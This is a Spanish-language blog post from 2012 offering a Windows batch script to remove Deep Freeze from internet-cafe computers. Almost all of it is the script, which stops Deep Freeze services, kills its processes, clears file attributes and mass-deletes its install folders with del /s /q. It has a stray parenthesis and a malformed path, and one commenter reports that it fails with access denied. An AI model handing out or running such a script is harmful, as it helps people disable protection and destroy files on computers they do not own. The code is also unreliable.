domingo, 22 de enero de 2012

Script batch para eliminar deep freeze

Bueno ahi vamos...
Veran... este codigo que viene a continuacion es para eliminar el molesto deep freeze de los cybers, ps a mi me incomoda, porque me gusta dejar algo guardado siempre (Doc, pics, movies,)

Con el siguiente codigo lo eliminan!
@echo off
cls
cd "ARCHIV~1"
cd "C:\Archivos de programa\HyperTechnologies\Deep Freeze_$Df"
net stop "FrzState2k.exe"
Taskkill /f /IM FrzState2k.exe /IM FrzState2k.exe /IM FrzState2k.exe /IM FrzState2k.exe
cd "C:\Archivos de programa\HyperTechnologies\Deep Freeze_$Df"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa:\HyperTechnologies\Deep Freeze"
net stop "DFServEx.exe"
Taskkill /f /IM DFServEx.exe /IM DFServEx.exe /IM DFServEx.exe /IM DFServEx.exe
cd "C:\Archivos de programa\HyperTechnologies\Deep Freeze"
attrib -H -S -R *.*
del /s /q *.*
)
exit 

2 comentarios:

  1. acion es para eliminar el molesto deep freeze de los cybers, ps a mi me incomoda, porque me gusta dejar buy hublot

    ResponderEliminar
  2. Me sale acceso denegado y eso que lo ejecute como bat y como administrador,

    ResponderEliminar